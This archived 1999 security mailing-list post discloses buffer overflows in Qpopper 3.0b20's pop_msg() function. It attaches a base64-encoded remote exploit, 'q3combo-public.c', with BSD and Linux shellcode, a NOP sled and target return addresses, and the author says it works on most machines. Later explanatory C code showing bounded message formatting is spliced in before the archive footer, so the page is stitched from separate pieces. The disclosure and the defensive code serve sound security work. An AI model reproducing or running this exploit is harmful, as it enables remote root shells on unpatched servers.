I found this overflow myself earlier this month. Seems someone else recently found it before Qualcomm was able to issue a patch. The 2.x series is not vulnerable because AUTH is not yet supported and the error returned by attempting to use AUTH does not call pop_msg() with any user input.

There is also another overflow besides the AUTH overflow, also occurring in pop_msg(), which can occur if a valid username and password are first entered. pop_get_subcommand.c contains this line near the bottom in qpopper3.0b20:

    pop_msg(p,POP_FAILURE, "Unknown command: \"%s %s\".",p->pop_command,p->pop_subcommand);

No bounds checking is done on the attempted subcommand. It is interesting to note that in qpop 2.53, a similar line is used, but with limits on the string length!

    pop_msg(p,POP_FAILURE, "Unknown command: \"%.128s %.128s\".",p->pop_command, p->pop_subcommand);

I guess Qualcomm did not continue development of Qpopper directly from the 2.53 series, but rewrote code from scratch and/or based it on earlier code. As a solution, pop_msg() should also do bounds checking, and not make the calling line responsible for it (although that's good practice too).

Attached is my original exploit that works on *BSD and Linux. (Solaris is NOT vulnerable to the AUTH overflow). Slight modification is needed on one line as the comments say. This exploit will actually work on the majority of machines then. Qualcomm: you have already received my working exploit with no modification needed. Let's hope for an official patch soon.
- sk8@lucid-solutions.com http://www.lucid-solutions.com --2110849577-815205743-943993525=:26891 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="q3combo-public.c" Content-Transfer-Encoding: BASE64 Content-ID: <Pine.LNX.4.10.9911301525250.26891at_private> Content-Description: Content-Disposition: attachment; filename="q3combo-public.c" LyogUVBPUCB2ZXJzaW9uIDMuMGIyMCBhbmQgbG93ZXIgYmV0YSB2ZXJzaW9u cyBSRU1PVEUgRVhQTE9JVA0KICogY29tYmluYXRpb24gKkJTRCBhbmQgTGlu dXgNCiAqDQogKiBzazhAbHVjaWQtc29sdXRpb25zLmNvbQ0KICogaHR0cDov L3d3dy5sdWNpZC1zb2x1dGlvbnMuY29tDQogKg0KICogSSBoYXZlIHdyaXR0 ZW4gdGhpcyB0byB0ZXN0IGFuZCBkZW1vbnN0cmF0ZSB2dWxuZXJhYmlsaXRp ZXMgb24gY2xpZW50cycgDQogKiBzeXN0ZW1zIG9ubHkuICANCiAqDQogKiAh ISEhISEhISEhRE8gTk9UIGRpc3RyaWJ1dGUhISEhISEhISEhDQogKiAoYXQg bGVhc3Qgbm90IHVudGlsIFF1YWxjb21tIGlzc3VlcyBhIHBhdGNoKQ0KICog DQogKiBZb3UgbWF5IG9ubHkgdXNlIHRoaXMgdG8gdGVzdCB5b3VyIG93biBz eXN0ZW0ocykuDQogKiBJIGFtIG5vdCByZXNwb25zaWJsZSBmb3IgYW55IHVu YXV0aG9yaXplZCB1c2Ugb2YgdGhpcyBwcm9ncmFtLg0KICoNCiAqIHRlc3Rl ZCBvbiBCU0RJIDMuMC80LjAuMSwgRnJlZUJTRCAyLjIuOC8zLjMsIExpbnV4 IA0KICogDQogKiBTaW5jZSBwb3BwZXIgaXMgdXN1YWxseSBjb21waWxlZCBi eSB0aGUgYWRtaW4sIHJldHVybiBhZGRyZXNzZXMgd2lsbCB2YXJ5LA0KICog YnV0IEkgaGF2ZSBpbmNsdWRlZCBjb21tb24gdmFsdWVzLiAgWW91IG1heSBo YXZlIHRvIHByb3ZpZGUgYW4gb2Zmc2V0DQogKiB0byBnZXQgaXQgdG8gd29y ayBvbiB5b3VyIHN5c3RlbS4NCiAqIA0KICogSSB3cm90ZSB0aGUgZXhwbG9p dCBuZWFyIHRoZSBiZWdpbm5pbmcgb2YgTm92ZW1iZXIgMTk5OSwgYW5kIHVu bGlrZSBzb21lIA0KICogb3RoZXIgZXhwbG9pdHMgSSd2ZSBzZWVuIHNpbmNl LCB0aGlzIG9uZSB3b3JrcyBldmVuIG9uIExpbnV4IGJveGVzIG9uIHdoaWNo IA0KICogaW5ldGQgd2FzIG5vdCBzdGFydGVkIGZyb20gYSBzaGVsbCBwcm9t cHQuDQogKg0KICogT25lIG1pbm9yIGNoYW5nZSBtdXN0IGJlIG1hZGUgZm9y IHRoaXMgdG8gZXhwbG9pdCB0aGUgQVVUSCBvdmVyZmxvdy4NCiAqDQogKiBV c2FnZTogSWYgeW91IGNhbid0IGZpZ3VyZSBvdXQgaG93IHRvIHVzZSB0aGlz LCB5b3Ugc2hvdWxkbid0DQogKiAJICBiZSBpbiB0aGUgc2VjdXJpdHkgYnVz aW5lc3MuICAodHJ5IG5ldGNhdCkNCiAqLw0KDQojaW5jbHVkZSA8c3RkaW8u aD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCiNpbmNsdWRlIDxzeXMvdGltZS5o 
Pg0KI2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHVuaXN0ZC5o Pg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxuZXRpbmV0 L2luLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCg0KdW5zaWduZWQgaW50IE5P UD0weDkwOw0KDQp1bnNpZ25lZCBsb25nIG9mZnNldD0wOyAvKiBkZWZhdWx0 IG9mZnNldCAqLw0KDQpjaGFyIGJzZHNjW109DQoJIlx4ZWJceDMyXHg1ZVx4 MzFceGRiXHg4OVx4NWVceDA3XHg4OVx4NWVceDEyXHg4OVx4NWVceDE3Ig0K CSJceDg4XHg1ZVx4MWNceDhkXHgxZVx4ODlceDVlXHgwZVx4MzFceGMwXHhi MFx4M2JceDhkXHg3ZSINCgkiXHgwZVx4ODlceGZhXHg4OVx4ZjlceGJmXHgx MFx4MTBceDEwXHgxMFx4MjlceDdlXHhmNVx4ODkiDQoJIlx4Y2ZceGViXHgw MVx4ZmZceDYyXHg2MVx4NjNceDYwXHhlYlx4MWJceGU4XHhjOVx4ZmZceGZm Ig0KCSJceGZmL2Jpbi9zaFx4YWFceGFhXHhhYVx4YWFceGZmXHhmZlx4ZmZc eGJiXHhiYlx4YmJceGJiIg0KCSJceGNjXHhjY1x4Y2NceGNjXHg5YVx4YWFc eGFhXHhhYVx4YWFceDA3XHhhYSI7DQoNCmNoYXIgbGludXhzY1tdPQ0KCSJc eGViXHgyMlx4NWVceDg5XHhmM1x4ODlceGY3XHg4M1x4YzdceDA3XHgzMVx4 YzBceGFhIg0KCSJceDg5XHhmOVx4ODlceGYwXHhhYlx4ODlceGZhXHgzMVx4 YzBceGFiXHhiMFx4MDhceDA0Ig0KCSJceDAzXHhjZFx4ODBceDMxXHhkYlx4 ODlceGQ4XHg0MFx4Y2RceDgwXHhlOFx4ZDlceGZmIg0KCSJceGZmXHhmZi9i aW4vc2giOw0KDQpzdHJ1Y3QgdmVyc2lvbiB7DQoJaW50IG51bTsNCgljaGFy KiBzeXN0eXBlOw0KCWludCBidWZmZXJfbGVuZ3RoOw0KCWxvbmcgYWRkcmVz czsNCn07DQoNCnN0cnVjdCB2ZXJzaW9uIHZlcmxpc3RbXSA9IHsNCgl7MCwg IkJTREkgMi54LzMueCwgRnJlZUJTRCAyLngiLCAxMDAxLCAweGVmYmZkNTZj fSwNCgl7MSwgIkJTREkgNC54IiwgMTAwMSwgMHg4MDQ3NTY0fSwNCgl7Miwg IkZyZWVCU0QgMy54IiwgMTAwMSwgMHhiZmJmZDNkY30sDQoJezMsICJMaW51 eCIsIDk5MCwgMHhiZmZmZDMwNH0sDQoJezAsIDAsIDAsIDB9DQp9Ow0KDQpp bnQgbWFpbihpbnQgYXJnYywgY2hhcioqIGFyZ3YpIHsNCgljaGFyKiBidWZm ZXIsICpzaGVsbGNvZGU7DQoJaW50IGJ1ZmxlbiwgaT0wLCB2ZXIsIHJldGFk ZHIsIGFsaWduPTA7DQoJc3RydWN0IHNvY2thZGRyX2luIHNvY2thZGRyOw0K CXN0cnVjdCBob3N0ZW50KiBob3N0Ow0KDQoJaWYgKGFyZ2MgPCAyKSB7DQoJ CXByaW50ZigiVXNhZ2U6ICVzIHZlcnNpb24gW29mZnNldF1cbiIsIGFyZ3Zb MF0pOw0KCQlpPS0xOw0KCQlwcmludGYoIlxuQXZhaWxhYmxlIHZlcnNpb25z OlxuIik7DQoJCXdoaWxlICh2ZXJsaXN0WysraV0uc3lzdHlwZSkgIHsNCgkJ ICBwcmludGYoIiAgICVkOiAlc1xuIiwgdmVybGlzdFtpXS5udW0sIHZlcmxp 
c3RbaV0uc3lzdHlwZSk7DQoJCX0NCgkJcHJpbnRmKCJcbiIpOw0KCQlleGl0 KC0xKTsNCgl9DQoNCgl2ZXI9YXRvaShhcmd2WzFdKTsNCglpZiAoYXJnYyA+ IDIpIHsNCgkJb2Zmc2V0PWF0b2koYXJndlsyXSk7DQoJfQ0KCWlmIChzdHJz dHIodmVybGlzdFt2ZXJdLnN5c3R5cGUsICJMaW51eCIpKSB7DQoJCXNoZWxs Y29kZT1saW51eHNjOw0KCQlhbGlnbj0yOw0KCX0NCgllbHNlIHNoZWxsY29k ZT1ic2RzYzsNCg0KCWJ1Zmxlbj12ZXJsaXN0W3Zlcl0uYnVmZmVyX2xlbmd0 aDsNCglyZXRhZGRyPXZlcmxpc3RbdmVyXS5hZGRyZXNzOw0KDQoJYnVmZmVy PShjaGFyKiltYWxsb2MoYnVmbGVuKTsNCgltZW1zZXQoYnVmZmVyLCBOT1As IGJ1Zmxlbik7IA0KCW1lbWNweShidWZmZXIsICJBVVRIICIsIDQpOw0KCW1l bWNweShidWZmZXIrODAwLCBzaGVsbGNvZGUsIHN0cmxlbihzaGVsbGNvZGUp KTsNCglmb3IgKGk9ODAwK3N0cmxlbihzaGVsbGNvZGUpK2FsaWduOyBpPCBi dWZsZW4tNDsgaSs9NCkgew0KCQkqKCh1bnNpZ25lZCBsb25nIGludCAqKSZi dWZmZXJbaV0pPXJldGFkZHIrb2Zmc2V0Ow0KCX0NCglidWZmZXJbYnVmbGVu LTJdPSdcbic7DQoJYnVmZmVyW2J1Zmxlbi0xXT0nXG4nOw0KDQoJcHJpbnRm KCIlc1xuIiwgYnVmZmVyKTsNCn0NCg== --2110849577-815205743-943993525=:26891--
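The post's point is that the 2.53 fix (the "%.128s" precision in the caller) and the fix it asks for (bounds checking inside pop_msg() itself) are two separate layers, and that relying on the caller alone is fragile. The following is an added example, not code from the post or from Qpopper, that shows both layers in isolation: a hypothetical bounded `safe_pop_msg()` built on vsnprintf, the two "Unknown command" format strings quoted in the post, and helper functions that report how many bytes each variant would produce for an over-long subcommand. The buffer size MSG_BUF, the function names, the status codes and the constructed "AUTH" plus 2000-byte subcommand input are all assumptions of this example, not values from Qpopper.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical reply-buffer size for this example; not Qpopper's real size. */
#define MSG_BUF 1024
/* Longest subcommand the example will construct. */
#define MAX_SUB 4096

/* Hypothetical status codes returned by the bounded formatter. */
enum { MSG_OK = 0, MSG_TRUNCATED = 1, MSG_ERROR = -1 };

/* Length the formatted string *would* have, computed without writing it.
   This is exactly what an unbounded sprintf/vsprintf would try to store. */
int required_len(const char *fmt, ...)
{
    va_list ap;
    int n;
    va_start(ap, fmt);
    n = vsnprintf(NULL, 0, fmt, ap);
    va_end(ap);
    return n;
}

/* Bounded stand-in for pop_msg(): the callee limits the write itself, so a
   caller that forgets "%.128s" cannot overrun the buffer. The return value
   tells the caller whether the reply was cut short, which is worth logging. */
int safe_pop_msg(char *out, size_t outlen, const char *fmt, ...)
{
    va_list ap;
    int n;
    if (out == NULL || outlen == 0)
        return MSG_ERROR;
    va_start(ap, fmt);
    n = vsnprintf(out, outlen, fmt, ap);
    va_end(ap);
    if (n < 0) {
        out[0] = '\0';
        return MSG_ERROR;
    }
    return (size_t)n >= outlen ? MSG_TRUNCATED : MSG_OK;
}

/* The two format strings quoted in the post: 3.0b20's unbounded one and
   2.53's precision-limited one. */
static const char *unknown_fmt(int bounded)
{
    return bounded ? "Unknown command: \"%.128s %.128s\"."
                   : "Unknown command: \"%s %s\".";
}

/* Constructed input for the example: a subcommand of sublen 'A' bytes. */
static const char *make_sub(size_t sublen)
{
    static char sub[MAX_SUB + 1];
    if (sublen > MAX_SUB)
        sublen = MAX_SUB;
    memset(sub, 'A', sublen);
    sub[sublen] = '\0';
    return sub;
}

/* Bytes the reply would occupy (excluding the NUL) for a subcommand of the
   given length, with the "AUTH" command assumed as p->pop_command. */
int unknown_command_len(size_t sublen, int bounded)
{
    return required_len(unknown_fmt(bounded), "AUTH", make_sub(sublen));
}

/* Format the reply into a MSG_BUF buffer through the bounded callee and
   report whether it fit. */
int reply_status(size_t sublen, int bounded)
{
    char buf[MSG_BUF];
    return safe_pop_msg(buf, sizeof buf, unknown_fmt(bounded), "AUTH", make_sub(sublen));
}

/* Length actually stored by the bounded callee (never more than MSG_BUF-1). */
int reply_len(size_t sublen, int bounded)
{
    char buf[MSG_BUF];
    safe_pop_msg(buf, sizeof buf, unknown_fmt(bounded), "AUTH", make_sub(sublen));
    return (int)strlen(buf);
}

int main(void)
{
    size_t len = 2000;
    printf("subcommand of %zu bytes\n", len);
    printf("  unbounded format would need %d bytes (buffer is %d)\n",
           unknown_command_len(len, 0), MSG_BUF);
    printf("  %%.128s format needs %d bytes\n", unknown_command_len(len, 1));
    printf("  bounded callee, unbounded format: status %d, stored %d bytes\n",
           reply_status(len, 0), reply_len(len, 0));
    printf("  bounded callee, %%.128s format:   status %d, stored %d bytes\n",
           reply_status(len, 1), reply_len(len, 1));
    return 0;
}
```

With a 2000-byte subcommand the unbounded format asks for 2025 bytes, far past the 1024-byte buffer, while the "%.128s" form needs 153; the bounded callee turns the first case into a truncated-but-terminated reply instead of an overrun. Keeping both layers (precision in the caller, a length-aware formatter in the callee, and a check of the truncation status) means a single forgotten precision specifier in some other caller, like the one the post found, stops being a memory-safety bug and becomes a logged truncation.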
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:15:08 PDT